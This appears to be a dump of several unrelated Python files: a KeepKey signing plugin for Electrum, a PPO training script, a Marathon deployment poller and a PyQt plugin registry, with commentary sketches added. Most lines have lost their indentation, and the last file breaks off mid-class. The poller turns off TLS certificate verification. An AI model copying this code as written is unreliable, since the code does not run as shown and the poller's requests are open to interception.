if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
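# --- Illustrative sketch (separate from the plugin code above) -------------
# sign_message()/show_address() build a derivation path string such as
#     "<derivation prefix>/<change>/<index>"   e.g. "m/49'/2'/0'/0/5"
# and pass it to client.expand_path(), which keepkeylib turns into the
# address_n integer list sent to the device.  The helper below is only a
# rough standalone approximation of that conversion, for illustration; the
# plugin itself always relies on the library call.
HARDENED = 0x80000000
def approx_expand_path(path):
    address_n = []
    for part in path.split('/'):
        if part in ('m', ''):
            continue
        if part.endswith("'"):
            address_n.append(HARDENED + int(part[:-1]))   # hardened component
        else:
            address_n.append(int(part))
    return address_n
# approx_expand_path("m/49'/2'/0'/0/5")
# -> [0x80000031, 0x80000002, 0x80000000, 0, 5]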
|
DPPO_CHP.py
|
"""
"""
import tensorflow as tf
from tensorflow.contrib.distributions import Normal
import numpy as np
import matplotlib.pyplot as plt
import threading, queue
from CHP.CHP_MODEL import CHPEnv
import datetime
EP_MAX = 2500
EP_LEN = 300
N_WORKER = 4 # parallel workers
GAMMA = 0.9 # reward discount factor
A_LR = 0.000005 # learning rate for actor
C_LR = 0.00002 # learning rate for critic
MIN_BATCH_SIZE = 24 # minimum batch size for updating PPO
UPDATE_STEP = 5  # number of gradient update steps per PPO update
EPSILON = 0.2 # Clipped surrogate objective
ON_TRAIN = False
env = CHPEnv()
S_DIM = env.state_dim
A_DIM = env.action_dim
A_BOUND = env.action_bound[1]
class PPO(object):
def __init__(self):
self.sess = tf.Session()
self.tfs = tf.placeholder(tf.float32, [None, S_DIM], 'state')
# critic
w_init = tf.contrib.layers.xavier_initializer()
l_c = tf.layers.dense(self.tfs, 300, tf.nn.relu, kernel_initializer=w_init, name='lc')
l_c1 = tf.layers.dense(l_c, 100, tf.nn.relu, kernel_initializer=w_init, name='lc1')
self.v = tf.layers.dense(l_c1, 1, kernel_initializer=w_init, name='v') # state value
self.tfdc_r = tf.placeholder(tf.float32, [None, 1], 'discounted_r')
self.advantage = self.tfdc_r - self.v
self.closs = tf.reduce_mean(tf.square(self.advantage))
tf.summary.scalar('critic_loss', self.closs)
self.ctrain_op = tf.train.AdamOptimizer(C_LR).minimize(self.closs)
# actor
pi, pi_params = self._build_anet('pi', trainable=True)
        oldpi, oldpi_params = self._build_anet('oldpi', trainable=False)  # oldpi is only overwritten from pi, never trained
self.sample_op = tf.squeeze(pi.sample(1), axis=0) # choosing action
self.update_oldpi_op = [oldp.assign(p) for p, oldp in zip(pi_params, oldpi_params)]
self.tfa = tf.placeholder(tf.float32, [None, A_DIM], 'action')
self.tfadv = tf.placeholder(tf.float32, [None, 1], 'advantage')
# ratio = tf.exp(pi.log_prob(self.tfa) - oldpi.log_prob(self.tfa))
ratio = pi.prob(self.tfa) / (oldpi.prob(self.tfa) + 1e-5)
surr = ratio * self.tfadv # surrogate loss
self.aloss = -tf.reduce_mean(tf.minimum(
surr,
tf.clip_by_value(ratio, 1. - EPSILON, 1. + EPSILON) * self.tfadv))
tf.summary.scalar('actor_loss', self.aloss)
self.atrain_op = tf.train.AdamOptimizer(A_LR).minimize(self.aloss)
self.merged = tf.summary.merge_all()
self.sess.run(tf.global_variables_initializer())
def update(self):
global GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
if GLOBAL_EP < EP_MAX:
UPDATE_EVENT.wait() # wait until get batch of data
self.sess.run(self.update_oldpi_op) # old pi to pi
data = [QUEUE.get() for _ in range(QUEUE.qsize())]
data = np.vstack(data)
s, a, r = data[:, :S_DIM], data[:, S_DIM: S_DIM + A_DIM], data[:, -1:]
adv = self.sess.run(self.advantage, {self.tfs: s, self.tfdc_r: r})
[self.sess.run(self.atrain_op, {self.tfs: s, self.tfa: a, self.tfadv: adv}) for _ in range(UPDATE_STEP)]
[self.sess.run(self.ctrain_op, {self.tfs: s, self.tfdc_r: r}) for _ in range(UPDATE_STEP)]
UPDATE_EVENT.clear() # updating finished
GLOBAL_UPDATE_COUNTER = 0 # reset counter
ROLLING_EVENT.set() # set roll-out available
def _build_anet(self, name, trainable):
with tf.variable_scope(name):
l1 = tf.layers.dense(self.tfs, 300, tf.nn.relu, trainable=trainable)
l2 = tf.layers.dense(l1, 100, tf.nn.relu, trainable=trainable)
mu = A_BOUND * tf.layers.dense(l2, A_DIM, tf.nn.tanh, trainable=trainable)
sigma = tf.layers.dense(l2, A_DIM, tf.nn.softplus, trainable=trainable)
norm_dist = Normal(loc=mu, scale=sigma)
params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
return norm_dist, params
def choose_action(self, s):
s = s[np.newaxis, :]
a = self.sess.run(self.sample_op, {self.tfs: s})[0]
return np.clip(a, -1, 1)
def get_v(self, s):
if s.ndim < 2: s = s[np.newaxis, :]
return self.sess.run(self.v, {self.tfs: s})[0, 0]
def save(self):
saver = tf.train.Saver()
saver.save(self.sess, './params', write_meta_graph=False)
def restore(self):
saver = tf.train.Saver()
saver.restore(self.sess, './params')
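# --- Illustrative note (separate from the class above) ---------------------
# The actor loss above is the PPO clipped surrogate objective
#     aloss = -E[ min(ratio * adv, clip(ratio, 1 - EPSILON, 1 + EPSILON) * adv) ]
# with ratio = pi(a|s) / oldpi(a|s).  A tiny numeric illustration of the
# clipping with EPSILON = 0.2 (made-up numbers):
#     ratio = 1.5, adv = +1.0 -> min(1.5, 1.2 * 1.0) = 1.2   (gain is capped)
#     ratio = 0.5, adv = -1.0 -> min(-0.5, -0.8)     = -0.8  (the more pessimistic value is kept)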
class Worker(object):
def __init__(self, wid):
self.wid = wid
self.env = CHPEnv()
self.ppo = GLOBAL_PPO
def work(self):
global GLOBAL_EP, GLOBAL_RUNNING_R, GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
s = self.env.reset()
ep_r = 0
buffer_s, buffer_a, buffer_r = [], [], []
for t in range(EP_LEN):
if not ROLLING_EVENT.is_set(): # while global PPO is updating
ROLLING_EVENT.wait() # wait until PPO is updated
buffer_s, buffer_a, buffer_r = [], [], [] # clear history buffer
a = self.ppo.choose_action(s)
s_, r, done = self.env.step(a)
if t == EP_LEN - 1: done = True
buffer_s.append(s)
buffer_a.append(a)
                buffer_r.append(r/100)  # normalize reward; found to be useful
s = s_
ep_r += r/100
GLOBAL_UPDATE_COUNTER += 1 # count to minimum batch size
if done or GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
v_s_ = self.ppo.get_v(s_)
discounted_r = [] # compute discounted reward
for r in buffer_r[::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer_s), np.vstack(buffer_a), np.array(discounted_r)[:, np.newaxis]
buffer_s, buffer_a, buffer_r = [], [], []
QUEUE.put(np.hstack((bs, ba, br)))
if GLOBAL_UPDATE_COUNTER >= MIN_BATCH_SIZE:
ROLLING_EVENT.clear() # stop collecting data
UPDATE_EVENT.set() # globalPPO update
if GLOBAL_EP >= EP_MAX: # stop training
COORD.request_stop()
break
# record reward changes, plot later
if len(GLOBAL_RUNNING_R) == 0:
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(GLOBAL_RUNNING_R[-1] * 0.9 + ep_r * 0.1)
GLOBAL_EP += 1
print('{0:.1f}%'.format(GLOBAL_EP / EP_MAX * 100), '|W%i' % self.wid, '|Ep_r: %.2f' % ep_r, )
if __name__ == '__main__':
GLOBAL_PPO = PPO()
if ON_TRAIN:
starttime = datetime.datetime.now()
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
UPDATE_EVENT.clear() # no update now
ROLLING_EVENT.set() # start to roll out
workers = [Worker(wid=i) for i in range(N_WORKER)]
GLOBAL_UPDATE_COUNTER, GLOBAL_EP = 0, 0
GLOBAL_RUNNING_R = []
COORD = tf.train.Coordinator()
QUEUE = queue.Queue()
threads = []
for worker in workers: # worker threads
t = threading.Thread(target=worker.work, args=())
t.start()
threads.append(t)
# add a PPO updating thread
threads.append(threading.Thread(target=GLOBAL_PPO.update, ))
threads[-1].start()
COORD.join(threads)
endtime = datetime.datetime.now()
print((endtime - starttime).seconds)
GLOBAL_PPO.save()
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
np.savetxt('R_dppo.txt', GLOBAL_RUNNING_R, delimiter=',')
        plt.xlabel('Episode')
        plt.ylabel('Moving reward')
        plt.ion()
plt.show()
else:
GLOBAL_PPO.restore()
s = env.set()
print(env.device_info)
state = np.zeros((300, 14))
device = np.zeros((300, 4, 4))
dis_p = np.zeros(300)
dis_q = np.zeros(300)
cost = np.zeros(300)
for t in range(300):
env.render()
s = env.step(GLOBAL_PPO.choose_action(s))[0]
state[t, :] = s
cost[t] = env.realcost
print(env.device_info)
device[t, :, :] = env.device_info
np.save("state.npy", state)
np.save("device.npy", device)
np.save("cost.npy", cost)
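# --- Illustrative sketch (separate from the training script above) ---------
# Worker.work() converts a buffer of rewards into bootstrapped discounted
# returns by walking the buffer backwards from the critic's value of the
# final state: R_t = r_t + GAMMA * R_{t+1}.  A standalone toy example of the
# same computation (the numbers are made up for illustration):
import numpy as np
gamma = 0.9
rewards = [1.0, 0.0, 2.0]       # r_0, r_1, r_2 collected during a rollout
v_last = 5.0                    # critic estimate V(s_3) used as the bootstrap
returns = []
running = v_last
for r in reversed(rewards):
    running = r + gamma * running
    returns.append(running)
returns.reverse()               # -> [6.265, 5.85, 6.5]
br = np.array(returns)[:, np.newaxis]   # same column shape as the script's 'br'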
|
marathonpoller.py
|
import requests
import json
import time
import threading
from .marathonevents import *
from performance.driver.core.classes import Observer
from performance.driver.core.events import TickEvent, TeardownEvent, StartEvent
from performance.driver.core.reflection import subscribesToHint, publishesHint
from performance.driver.core.utils import dictDiff
from performance.driver.core.eventfilters import EventFilter
from performance.driver.classes.channel.marathon import MarathonDeploymentStartedEvent
DIFF_REASON_REMOVED = 0
DIFF_REASON_CREATED = 1
DIFF_REASON_MODIFIED = 2
EMPTY_GROUP = {"id": "/", "apps": [], "groups": [], "pods": []}
class MarathonPollerObserver(Observer):
"""
The *Marathon Poller Observer* is a polling-based fallback observer that can
fully replace the ``MarathonEventsObserver`` when the SSE event bus is not
available.
::
observers:
- class: observer.MarathonPollerObserver
# The URL to the marathon base
url: "{{marathon_url}}"
# [Optional] Additional headers to send
headers:
          Accept: text/plain
# [Optional] How long to wait between consecutive polls (seconds)
interval: 0.5
# [Optional] How long to wait before considering the deployment "Failed"
# If set to 0 the deployment will never fail.
failureTimeout: 0
# [Optional] How many times to re-try polling the endpoint before
# considering the connection closed
retries: 3
# [Optional] Event binding
events:
# [Optional] Which event to wait to start polling
start: StartEvent
# [Optional] Which event to wait to stop polling
stop: TeardownEvent
  This observer polls the ``/groups`` endpoint at the configured interval and
  calculates differences from the previously observed state. Any differences
  are propagated as virtual deployment events:
* ``MarathonDeploymentSuccessEvent``
* ``MarathonDeploymentFailedEvent``
  If requested, the poller looks for ``MarathonDeploymentStartedEvent``
  events and waits for each deployment to complete within a given time. If
  that time passes, a synthetic failure event is generated:
* ``MarathonDeploymentFailedEvent``
.. note::
This observer will automatically inject an ``Authorization`` header if
a ``dcos_auth_token`` definition exists, so you don't have to specify
it through the ``headers`` configuration.
Note that a ``dcos_auth_token`` can be dynamically injected via an
authentication task.
"""
@subscribesToHint(MarathonDeploymentStartedEvent)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load config
config = self.getRenderedConfig()
self.url = config['url']
self.headers = config.get('headers', {})
self.pollInterval = config.get('interval', 0.5)
self.failureTimeout = config.get('failureTimeout', 0)
self.retries = config.get('retries', 3)
eventsConfig = config.get('events', {})
self.startEventSession = EventFilter(
eventsConfig.get('start', 'StartEvent')).start(None,
self.handleStartEvent)
self.stopEventSession = EventFilter(
eventsConfig.get('stop', 'TeardownEvent')).start(
None, self.handleStopEvent)
self.retriesLeft = self.retries
self.requestTraceIDs = {}
self.requestedDeployments = set()
self.requestedDeploymentTimeout = {}
self.pollDelta = 0
self.connected = False
self.lastGroup = {}
self.reset()
# Keep track of outgoing deployment requests
self.eventbus.subscribe(
self.handleRequest, events=(MarathonDeploymentStartedEvent, ))
self.eventbus.subscribe(self.handleEvent)
# Start thread
self.thread = None
self.active = False
def handleEvent(self, event):
"""
Pass down event to start/stop sessions
"""
self.startEventSession.handle(event)
self.stopEventSession.handle(event)
def handleStartEvent(self, event):
"""
Handle request to start polling
"""
    if self.thread is not None:
return
# Start polling thread
self.active = True
self.thread = threading.Thread(target=self.pollerThread, name="marathonpoller-poller")
self.thread.start()
def handleStopEvent(self, event):
"""
Handle request to stop polling
"""
if self.thread is None:
return
# Stop polling thread
self.active = False
self.thread.join()
def pollerThread(self):
"""
The poller thread polls the marathon endpoint at fixed intervals
"""
while self.active:
self.pollGroupsEndpoint()
time.sleep(self.pollInterval)
def reset(self):
"""
Reset the local state
"""
self.retriesLeft = self.retries
self.connected = False
self.lastGroup = {"id": "/", "apps": [], "groups": [], "pods": []}
def cleanupInstanceDeployment(self, inst):
"""
Remove records associated to the given instance
"""
if inst in self.requestedDeployments:
self.requestedDeployments.remove(inst)
if inst in self.requestedDeploymentTimeout:
del self.requestedDeploymentTimeout[inst]
if inst in self.requestTraceIDs:
del self.requestTraceIDs[inst]
@publishesHint(MarathonDeploymentFailedEvent)
def failRequestedDeployment(self, inst, reason="due to timeout"):
"""
Fail the specified requested deployment
"""
self.logger.warn('Failing deployment {} {}'.format(inst, reason))
self.eventbus.publish(
MarathonDeploymentFailedEvent(
None, inst, traceid=self.requestTraceIDs.get(inst, None)))
self.cleanupInstanceDeployment(inst)
def failAllPendingRequests(self):
"""
Fail all the requested deployments
"""
    # Copy this list in order to be able to iterate over its items
# while removing items from `self.requestedDeployments`
immutableList = list(self.requestedDeployments)
for inst in immutableList:
self.failRequestedDeployment(inst, "due to connection interrupt")
def failExpiredPendingRequests(self):
"""
    Fail all the requests that have passed their grace timeout
"""
ts = time.time()
expire_ids = []
for inst, timeout in self.requestedDeploymentTimeout.items():
if ts >= timeout:
expire_ids.append(inst)
for inst in expire_ids:
self.failRequestedDeployment(inst)
def handleRequest(self, event):
"""
Keep track of the requested deployments
"""
self.requestTraceIDs[event.instance] = event.traceids
self.requestedDeployments.add(event.instance)
# Set the deployment failure timeout
ts = time.time()
if self.failureTimeout > 0:
self.requestedDeploymentTimeout[
event.instance] = ts + self.failureTimeout
@publishesHint(MarathonStartedEvent, MarathonUnavailableEvent,
MarathonDeploymentSuccessEvent,
MarathonGroupChangeSuccessEvent)
def pollGroupsEndpoint(self):
"""
Poll the groups endpoint
"""
definitions = self.getDefinitions()
# If we are missing an `Authorization` header but we have a
# `dcos_auth_token` definition, allocate an `Authorization` header now
#
# Note: We are putting this within the loop because the `dcos_auth_token`
# might appear at a later time if an authentication task is already
# in progress.
#
headers = dict(self.headers)
if not 'Authorization' in headers \
and 'dcos_auth_token' in definitions:
headers['Authorization'] = 'token={}'.format(
definitions['dcos_auth_token'])
# Poll the endpoint
group = None
try:
url = '{}/v2/groups?embed=group.groups&embed=group.apps&embed=group.pods&embed=group.apps.deployments'.format(
self.url)
self.logger.debug('Requesting {}'.format(url))
res = requests.get(url, headers=headers, verify=False)
# Handle HTTP response
if res.status_code < 200 or res.status_code >= 300:
self.logger.warn(
'Unexpected HTTP response HTTP/{}'.format(res.status_code))
if self.connected:
self.logger.debug('We are connected, ignoring for {} more tries'.
format(self.retriesLeft))
self.retriesLeft -= 1
if self.retriesLeft > 0:
self.logger.debug('Not taking an action')
return # Don't take any action, wait for next tick
else:
self.retriesLeft = self.retries
self.logger.debug('Resetting retries to {}'.format(self.retriesLeft))
group = res.json()
except Exception as e:
self.logger.error(
'Unexpected exception {}: {}'.format(type(e).__name__, str(e)))
if self.connected:
self.logger.debug('We are connected, ignoring for {} more tries'.
format(self.retriesLeft))
self.retriesLeft -= 1
if self.retriesLeft > 0:
self.logger.debug('Not taking an action')
return # Don't take any action, wait for next tick
# Handle connected state toggle
if not self.connected and group:
self.logger.info('Marathon is responding')
self.connected = True
self.lastGroup = group
self.eventbus.publish(MarathonStartedEvent())
elif self.connected and not group:
self.logger.warn('Marathon became unresponsive')
self.failAllPendingRequests()
self.reset()
self.eventbus.publish(MarathonUnavailableEvent())
elif self.connected:
(diff_instances, diff_groups) = diffRootGroups(self.lastGroup, group)
self.lastGroup = group
# Create one virtual deployments for every affected instance
for inst in diff_instances:
self.eventbus.publish(
MarathonDeploymentSuccessEvent(
None, [inst], traceid=self.requestTraceIDs.get(inst, None)))
self.cleanupInstanceDeployment(inst)
# Create virtual group deployments
for grp in diff_groups:
self.eventbus.publish(
MarathonGroupChangeSuccessEvent(
None, grp, traceid=self.requestTraceIDs.get(grp, None)))
self.cleanupInstanceDeployment(grp)
# Fail expired requests
self.failExpiredPendingRequests()
def diffRootGroups(group_a, group_b):
"""
Calculate the differences in apps, pods and groups of the given two groups
"""
diff_instances = set()
diff_groups = set()
# Get app IDs from two groups
apps_a = {}
for app_a in group_a['apps']:
apps_a[app_a['id']] = app_a
apps_b = {}
for app_b in group_b['apps']:
apps_b[app_b['id']] = app_b
# Check for changes in apps
for iid in apps_a.keys():
if not iid in apps_b:
diff_instances.add(iid) # Removed
for iid in apps_b.keys():
if not iid in apps_a:
if len(apps_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
for iid, app_a in apps_a.items():
if iid in apps_b:
if dictDiff(app_a, apps_b[iid]):
if len(apps_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
# Get pod IDs from two groups
pods_a = {}
for pod_a in group_a['pods']:
pods_a[pod_a['id']] = pod_a
pods_b = {}
for pod_b in group_b['pods']:
pods_b[pod_b['id']] = pod_b
# Check for changes in pods
for iid in pods_a.keys():
if not iid in pods_b:
diff_instances.add(iid)
for iid in pods_b.keys():
if not iid in pods_a:
if len(pods_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
for iid, pod_a in pods_a.items():
if iid in pods_b:
if dictDiff(pod_a, pods_b[iid]):
if len(pods_b[iid].get('deployments', [])) == 0:
diff_instances.add(iid) # Added & No remaining deployments
  # Get sub-group IDs from the two groups (avoid shadowing the parameters)
  groups_a = {}
  for child_a in group_a['groups']:
    groups_a[child_a['id']] = child_a
  groups_b = {}
  for child_b in group_b['groups']:
    groups_b[child_b['id']] = child_b
  # Check for changes in sub-groups
for gid in groups_a.keys():
if not gid in groups_b:
diff_groups.add(gid)
for gid in groups_b.keys():
if not gid in groups_a:
diff_groups.add(gid)
for gid, pgroup_a in groups_a.items():
if gid in groups_b:
if dictDiff(pgroup_a, groups_b[gid]):
diff_groups.add(gid)
  # For every changed group, recurse into its details
base_groups_immutable = set(diff_groups)
for group in base_groups_immutable:
empty_group = {"id": group, "apps": [], "pods": [], "groups": []}
if group in groups_a:
if group in groups_b:
(child_diff_instances, child_diff_groups) = diffRootGroups(
groups_a[group], groups_b[group])
diff_instances.update(child_diff_instances)
diff_groups.update(child_diff_groups)
else:
(child_diff_instances, child_diff_groups) = diffRootGroups(
groups_a[group], empty_group)
diff_instances.update(child_diff_instances)
diff_groups.update(child_diff_groups)
else:
(child_diff_instances, child_diff_groups) = diffRootGroups(
empty_group, groups_b[group])
diff_instances.update(child_diff_instances)
diff_groups.update(child_diff_groups)
# Return instance and group diffs
return (diff_instances, diff_groups)
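# --- Illustrative sketch (separate from the observer code above) -----------
# diffRootGroups() compares two snapshots of the /v2/groups tree.  Given the
# logic above, the two made-up snapshots below would report '/app-removed'
# (it disappears) and '/app-finished' (it appears with no deployments left)
# as changed instances, and no changed groups.
group_before = {
  "id": "/",
  "apps": [{"id": "/app-removed", "instances": 1, "deployments": []}],
  "pods": [],
  "groups": []
}
group_after = {
  "id": "/",
  "apps": [{"id": "/app-finished", "instances": 2, "deployments": []}],
  "pods": [],
  "groups": []
}
# diff_instances, diff_groups = diffRootGroups(group_before, group_after)
# -> diff_instances == {'/app-removed', '/app-finished'}, diff_groups == set()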
|
hplugins.py
|
import logging
import os
import uuid
import threading
import sys
from PyQt5.QtCore import pyqtWrapperType
log = logging.getLogger(__name__)
log_i = lambda a: None
log_d = lambda a: None
log_w = lambda a: None
log_e = lambda a: None
log_c = lambda a: None
class PluginError(ValueError):
pass
class PluginIDError(PluginError):
pass
class PluginNameError(PluginIDError):
pass
class PluginMethodError(PluginError):
pass
class Plugins:
    """Registry of loaded plugins, their ids and the hooks they expose."""
_connections = []
_plugins = {}
_pluginsbyids = {}
hooks = {}
def register(self, plugin):
assert isinstance(plugin, HPluginMeta)
self.hooks[plugin.ID] = {}
self._plugins[plugin.NAME] = plugin() # TODO: name conflicts?
self._pluginsbyids[plugin.ID] = self._plugins[plugin.NAME]
def _connectHooks(self):
for plugin_name, pluginid, h_name, handler in self._connections:
log_i("{}:{} connection to {}:{}".format(plugin_name, handler, pluginid, h_name))
print(self.hooks)
try:
p = self.hooks[pluginid]
except KeyError:
log_e("Could not find plugin with plugin id: {}".format(pluginid))
return
try:
h = p[h_name]
except KeyError:
log_e("Could not find pluginhook with name: {}".format(h_name))
return
h.addHandler(handler, (plugin_name, pluginid))
return True
def __getattr__(self, key):
try:
return self._plugins[key]
except KeyError:
raise PluginNameError(key)
registered = Plugins()
class HPluginMeta(pyqtWrapperType):
def __init__(cls, name, bases, dct):
if not name.endswith("HPlugin"):
log_e("Main plugin class should end with name HPlugin")
return
if not hasattr(cls, "ID"):
log_e("ID attribute is missing")
return
cls.ID = cls.ID.replace('-', '')
if not hasattr(cls, "NAME"):
log_e("NAME attribute is missing")
return
if not hasattr(cls, "VERSION"):
log_e("VERSION attribute is missing")
return
if not hasattr(cls, "AUTHOR"):
log_e("AUTHOR attribute is missing")
return
if not hasattr(cls, "DESCRIPTION"):
log_e("DESCRIPTION attribute is missing")
return
try:
val = uuid.UUID(cls.ID, version=4)
assert val.hex == cls.ID
except ValueError:
log_e("Invalid plugin id. UUID4 is required.")
return
except AssertionError:
log_e("Invalid plugin id. A valid UUID4 is required.")
return
if not isinstance(cls.NAME, str):
log_e("Plugin name should be a string")
return
if not isinstance(cls.VERSION, tuple):
log_e("Plugin version should be a tuple with 3 integers")
return
if not isinstance(cls.AUTHOR, str):
log_e("Plugin author should be a string")
return
if not isinstance(cls.DESCRIPTION, str):
log_e("Plugin description should be a string")
return
super().__init__(name, bases, dct)
setattr(cls, "connectPlugin", cls.connectPlugin)
setattr(cls, "newHook", cls.createHook)
setattr(cls, "connectHook", cls.connectHook)
setattr(cls, "__getattr__", cls.__getattr__)
registered.register(cls)
def connectPlugin(cls, pluginid, plugin_name):
"""
Connect to other plugins
Params:
pluginid: PluginID of the plugin you want to connect to
            plugin_name: Name you want to refer to the other plugin as
        The other plugin's methods can then be used as: self.plugin_name.method()
"""
class OtherHPlugin:
def __init__(self, pluginid):
self._id = pluginid.replace('-', '')
def __getattr__(self, key):
try:
plugin = registered._pluginsbyids[self._id]
pluginmethod = getattr(plugin, key, None)
if pluginmethod:
return pluginmethod
else:
raise PluginMethodError(key)
except KeyError:
raise PluginIDError(self._id)
setattr(cls, plugin_name, OtherHPlugin(pluginid))
def connectHook(self, pluginid, hook_name, handler):
"""
Connect to other plugins' hooks
Params:
pluginid: PluginID of the plugin that has the hook you want to connect to
hook_name: Exact name of the hook you want to connect to
handler: Your custom method that should be executed when the other plugin uses its hook.
"""
assert isinstance(pluginid, str) and isinstance(hook_name, str) and callable(handler), ""
registered._connections.append((self.NAME, pluginid.replace('-', ''), hook_name, handler))
def createHook(self, hook_name):
"""
Create hooks that other plugins can extend
Params:
hook_name: Name of the hook you want to create.
Hook will be used as such: self.hook_name()
"""
assert isinstance(hook_name, str), ""
class Hook:
_handlers = set()
def addHandler(self, handler, pluginfo):
self._handlers.add((handler, pluginfo))
def __call__(self, *args, **kwargs):
handler_returns = []
                for handler, pluginfo in self._handlers:
                    try:
                        handler_returns.append(handler(*args, **kwargs))
                    except Exception as e:
                        # keep the original traceback so the failing plugin can be debugged
                        raise PluginError("{}:{}".format(pluginfo[0], pluginfo[1])) from e
return handler_returns
h = Hook()
registered.hooks[self.ID][hook_name] = h
def __getattr__(self, key):
try:
return registered.hooks[self.ID][key]
except KeyError:
            raise PluginMethodError(key)
#def startConnectionLoop():
# def autoConnectHooks():
# run = True
# while run:
# run = registered._connectHooks()
# auto_t = threading.Thread(target=autoConnectHooks)
# auto_t.start()
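# --- Illustrative sketch (separate from the module above) ------------------
# A minimal, hypothetical plugin showing the contract HPluginMeta enforces:
# the class name must end in "HPlugin", ID must be a UUID4 (dashes are
# stripped), NAME/AUTHOR/DESCRIPTION must be strings and VERSION a tuple.
# The id below is just an example value, not a real registered plugin.
class ExampleHPlugin(metaclass=HPluginMeta):
    ID = "1c5b0b1f-9e4a-4f3a-8d2c-7e6b5a4d3c2b"   # example UUID4
    NAME = "Example"
    VERSION = (0, 0, 1)
    AUTHOR = "Example Author"
    DESCRIPTION = "Demonstrates the plugin attribute contract."
    def __init__(self):
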